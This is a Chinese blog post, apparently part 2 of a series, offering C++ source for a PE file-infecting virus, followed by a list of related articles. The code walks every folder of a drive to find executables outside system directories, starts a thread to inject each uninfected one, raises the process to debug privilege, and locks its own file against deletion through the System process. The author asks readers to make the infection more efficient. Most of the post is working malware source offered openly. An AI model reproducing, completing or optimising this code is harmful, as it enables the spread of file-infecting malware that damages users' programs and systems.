PE型感染病毒 —— 遍历磁盘PE文件 (2)

最新推荐文章于 2023-01-11 21:56:26 发布
最新推荐文章于 2023-01-11 21:56:26 发布
阅读量816 收藏 1
点赞数
分类专栏: 技术文章 文章标签: shell 病毒 PE

自己在测试过程中,感觉效率不是很好,所以希望哪位大佬能提出宝贵的意见,在此深表感谢!

 

1、遍历磁盘中PE文件

[cpp] view plain copy print ?
  1. /************************************************************************/  
  2. /* 函数说明:遍历感染指定驱动器中所有exe文件 
  3. /* 参    数:驱动器名称,如C: 
  4. /* 返 回 值:遍历的数目 
  5. /* By:Koma   2009.12.18 23:55 
  6. /************************************************************************/  
  7. int EmuDiskFiles(LPCTSTR lpStr)  
  8. {  
  9.     CFileFind   fd;  
  10.     CString     strWild(lpStr);  
  11.     CString     str = fd.GetFilePath();         // 获取每个文件的绝对路径  
  12.     int         nTemp = 0;                      // 最大启动5个线程同时感染  
  13.     BOOL        bRet;  
  14.     HANDLE      hThread;  
  15.     DWORD       dwTid;  
  16.     strWild += _T("//*.*");                     // 查找类型  
  17.     bRet = fd.FindFile(strWild);                // 开始查找  
  18.     while (bRet){                               // 如果不为空,继续遍历  
  19. ReEmu:      bRet = fd.FindNextFile();           // 查找下一个文件  
  20.         if(fd.IsDots())                         // 过滤目录自身与上层目录  
  21.             continue;  
  22.         else if(fd.IsDirectory()){              // 判断是否为文件夹  
  23.             CString str = fd.GetFilePath();     // 获取文件夹路径  
  24.             EmuDiskFiles(str);                  // 继续遍历子目录  
  25.         }  
  26.         else  
  27.         {  
  28.             int nTemp1 = str.Find("WINDOWS");   // 如果是XP系统目录则跳过  
  29.             int nTemp2 = str.Find("WINNT"); // 如果是WIN2000系统目录也跳过  
  30.             if(nTemp1>0 || nTemp2>0)  
  31.                 goto ReEmu;  
  32.             if(str.Find(".exe")>0){          // 判断是否为exe扩展名  
  33.                 if(!IsInfect(str))              // 判断是否感染过  
  34.                 {  
  35.                     di.m_strFilePath = str;     // 设置感染文件的绝对路径  
  36.                     hThread = CreateThread (NULL, 0, (unsigned long (__stdcall *)(void *))ThreadInject,(LPVOID)(&diInject),NULL,&dwTid);   
  37.                     WaitForSingleObject(hThread,INFINITE);  
  38.                     //InfectPE(str);  
  39.                 }  
  40.                 continue;  
  41.             }  
  42.         }  
  43.         Sleep(10000);                           // 10秒种遍历一个文件  
  44.     }  
  45.     return 0;  
  46. }  

 

2、进程提权、保护文件

[cpp] view plain copy print ?
  1. /************************************************************************/  
  2. /* 函数说明:提升进程权限到debug权限 
  3. /* 参    数:无 
  4. /* 返 回 值:无 
  5. /* By:Koma   2009.12.17 21:20 
  6. /************************************************************************/  
  7. void RaiseToDebug()  
  8. {  
  9.     HANDLE hToken;  
  10.     HANDLE hProcess = GetCurrentProcess();      // 获取当前进程句柄   
  11.       
  12.     // 打开当前进程的Token,就是一个权限令牌,第二个参数可以用TOKEN_ALL_ACCESS  
  13.     if (OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))  
  14.     {  
  15.         TOKEN_PRIVILEGES tkp;  
  16.         if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid))  
  17.         {  
  18.             tkp.PrivilegeCount = 1;  
  19.             tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;  
  20.               
  21.             //通知系统修改进程权限  
  22.             BOOL bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0);  
  23.         }  
  24.         CloseHandle(hToken);  
  25.     }      
  26. }  
  27. /************************************************************************/  
  28. /* 函数说明:保护文件防止被轻易删除 
  29. /* 参    数:无 
  30. /* 返 回 值:无 
  31. /* By:Koma   2009.12.17 21:42 
  32. /************************************************************************/  
  33. BOOL OccupyFile(LPCTSTR lpFileName)   
  34. {   
  35.     RaiseToDebug();                             // 提升权限   
  36.       
  37.     // 打开syetem进程,打开前必须赋予PROCESS_DUP_HANDLE权限   
  38.     HANDLE hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, 4);  
  39.     if (hProcess == NULL)   
  40.     {   
  41.         hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, 8);   
  42.         if (hProcess == NULL)   
  43.             return FALSE;   
  44.     }   
  45.       
  46.     HANDLE hFile = NULL;   
  47.     HANDLE hTargetHandle = NULL;   
  48.       
  49.     // 创建一个文件,当然这个文件可以是本来就存在的   
  50.     hFile = CreateFile(lpFileName, GENERIC_READ | GENERIC_EXECUTE | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);      
  51.       
  52.     if (hFile == INVALID_HANDLE_VALUE)   
  53.     {   
  54.         // 文件创建或打开失败   
  55.         CloseHandle( hProcess );   
  56.         return FALSE;   
  57.     }  
  58.     return TRUE;  

清钟沁桐
关注
专栏目录
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 8609
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
[网络安全自学篇] 九十二.《Windows黑客编程技术详解》之病毒启动技术创建进程API、突破SESSION0隔离、内存加载详解(3)
热门推荐
杨秀璋的专栏
07-27 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第三篇文章主要介绍木马病毒启动技术,包括创建进程API、突破SESSION0隔离、内存加载详解,希望对您有所帮助。
PE文件导出函数
01-10
大部分人通过pNTHeader.OptionalHeader.DataDirectory[0].VirtualAddress获取导出函数,但不少DLL需要重新计算偏移,本例通过暴力搜索Section,避免某些情况下读取失败
windows下PE文件感染
01-18 401
。 转载于:https://www.cnblogs.com/beyond-Acm/p/4232123.html
PE文件感染
magedhenary的专栏
05-20 1069
最近学习了一下PE文件,看了份PE文件感染源码,分析了一下,其实就是修改进程,抛砖引玉 本来想把整个代码发下,但是太大了,只发函数的 #/////读取文件PE信息 BOOL readPEInfo(FILE* fp,MZHeader* outMZ,PE_Header* outPE,PE_ExtHeader* outpeXH,SectionHeader** outSecHdr) {
PE感染病毒 —— 遍历磁盘驱动器 (1)
Koma的主页
12-18 2079
前天某同事的U盘中毒,在10分钟内感染了近2G(大约一百个EXE安装文件,相当于5秒左右感染一个PE文件)。确实佩服这速度,于是WS32DSM反汇编,虽然我看不懂反汇编代码,但也只好硬着头皮揣摩一下思路并试试~~~ 感染前需要遍历驱动驱动器,下面是自己山寨的一份: 1、判断操作系统 如果是Windows 98/Me/95/CE或以下的系统则直接退出: /
PE文件感染程序设计(PE病毒
最新发布
Zyecho的博客
01-11 2746
记录PE病毒设计的入门实验
PE病毒的学习资料包
06-08
PE感染病毒 —— 遍历磁盘PE文件 (2) PE感染病毒 —— 遍历磁盘驱动器 (1) PE感染病毒 —— 增加节点修改PE入口 (3) Win32平台下的PE文件病毒的研究及实现。rar 关于PE病毒编写的学习 关于PE病毒编写的...
解密——系统 PE详解
m0_46357566的博客
07-18 503
1.PE详解1 1.序言 PE可执行文件格式是操作系统本身执行机制的反映,助于对底层的理解。(在弹幕里看到很多学外挂的…) 目的:掌握可执行文件的数据结构和运行机制 EXE 和DLL使用完全相同的PE格式 只是在一个字段标识出是哪种 64位PE并没有新增结构,也叫PE32+ PE位于winnt.h头文件中,可找到PE所有定义,可在计算机直接搜 PE中有32和64位之分,会在名称中表现出来 更有详尽图在鱼C论坛 2.PE的基本概念 PE是平面地址空间,被划分为不同区块,每个区块按页分边界来对齐,像书一样,可
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
PE文件感染杂谈
carche的专栏
01-21 1049
        PE文件规定了可执行文件的格式,凡是符合此格式的文件都能在windows系统上运行。PE文件的格式暂且不谈,说一些感染PE文件的几种途径。         导入表感染。这个涉及比较复杂的操作,首先,要自行写一个dll文件,提供程序中对原dll引用的所有函数,然后增加一个节区,修改ImportAddress中的地址,使其指向新增加的节,这样,程序加载后,只要调用相关函数,就会先执行自
浅析PE文件感染
Puzzle的专栏
05-15 1573
作 者: zyhfut 时 间: 2010-12-27,21:21:28 链 接: http://bbs.pediy.com/showthread.php?t=127202 PE文件感染,早已不是什么新鲜的话题。论坛中也有很多反复摧残PE文件的文章。这段时间在看病毒方面的知识,所以重新温习了下PE文件的结构,介绍PE结构的帖子很多,我就不详细介绍了,再介绍也不一定由牛人们介绍的详细。
计算机pe病毒感染过程,感染PE病毒分析与专杀修复工具的开发.pdf
weixin_30487899的博客
07-27 486
70 现代制造技术 与装备 2014 6 期 总 223 期感染PE 病毒分析与专杀修复工具的开发李西山(临沂市人民医院,临沂 276003 )摘 要:本文对感染技术在病毒发展过程中的地位进行了分析、然后重点分析感染病毒,针对感染病毒的难以检测和清除以及对可执行文件的破坏,本文提出了对特定的感染病毒编写相...
通过病毒原理较好的阐述了如何在pe中添加一个section
xuplus的专栏
04-15 2569
PE 文件的修改和感染策略  既然已经能够搜索磁盘及网络共享文件中的所有文件,要实现寄生,那么自然下一步就是对搜索到的PE文件进行感染了。感染PE的很重要的一个考虑就是将病毒代码写入到PE 文件的哪个位置。读写文件一般利用Win32 API CreateFile、CreateFileMapping、MapViewOfFile等API以内存映射文件的方式进行,这样可以避免自己管理缓冲的麻烦,因而为较
感染PE文件源码
哈哈Delphi学习空间
04-25 656
program XX;{$APPTYPE CONSOLE}usesSysUtils,Windows,ShellApi,TlHelp32;//-----------------------DETERMINE PROCESS EXISTANCE-----------------------------function process_exists(exeFileName: string): Boole
关于PE病毒编写的学习(四)——关于历遍磁盘的讨论
蛛丝
09-19 1859
在上一章中的“前置病毒”中,由于它只是一个测试病毒,因此该病毒只是搜索病毒文件所在文件夹的exe文件。显然,为了让它具有更好传染性,能够历遍整个磁盘或某些重要文件夹的特性,是十分重要的。回到正题,让我们来改进原来的代码首先,在原来的代码中,只要结尾是“.exe”就判断为"可执行程序",这种方法在大多数情况下是正确的,但是如果程序经过压缩或加密后,某些行为会出错。因此,更加详细的文件检查很多时是必要的,参考代码如下:BOOL IsExeFile(HANDLE hFile){ IMAGE_DOS_HEADE
EXP2 分析PE感染程序
zjlong668的博客
04-16 966
1.分析感染后的可执行程序 感染前和感染后对比: main-new.exe:最先传播病毒的exe文件,大小:3KB test.exe:感染目标,感染前大小:2.5KB test2.exe:感染后的exe文件感染后大小:6.5KB winhex打开这两个文件,利用相关功能分析(查看—>同步和比较) 感染前后文件不一样的地方就被winhex用黑色给标记出来了 一共有四处不一样: 感染前有3个节(00 03)感染后有4个节(00 04) 感染前时间戳为B...
PE文件感染和内存驻留
杨航的专栏
03-12 1716
这次,作者将和大家一起讨论病毒感染技术。另外,从本文开始,我们将陆续接触到一些病毒的高级编码技术。例如,内存驻留、EPO(入口点模糊)技术、加密技术、多态和变形等。通过这些高级技巧,你将进一步感受到病毒技术的精华,从而更好的享受其中精妙的思想与编程技艺。   在解决了起始目录的问题之后,就可以从这些起始目录开始使用FindFirstFile和FindNextFile开始遍历其下以及其子目录下的
C++非递归与递归遍历磁盘文件示例及应用
在C++编程中,遍历磁盘文件是一项常见的任务,特别是在进行文件系统操作或查找特定文件时。本文将详细介绍两种方法:非递归遍历和递归遍历。这两种方法在处理磁盘文件时有不同的优势和适用场景。 1. **非递归遍历**...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值